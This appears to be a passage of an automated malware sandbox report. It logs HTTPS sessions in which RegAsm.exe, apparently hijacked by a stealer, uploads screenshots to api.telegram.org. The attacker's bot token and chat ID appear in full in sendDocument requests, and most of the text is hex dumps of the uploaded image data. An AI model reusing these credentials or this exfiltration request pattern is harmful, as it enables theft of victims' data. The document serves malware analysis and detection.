66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:34 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:34 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.449764149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:35 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd31fcb1fbe305
                                                                            Host: api.telegram.org
                                                                            Content-Length: 698579
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 63 62 31 66 62 65 33 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd31fcb1fbe305Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:35 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:36 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:36 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.449766149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:37 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3218644a77aa
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:37 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 38 36 34 34 61 37 37 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 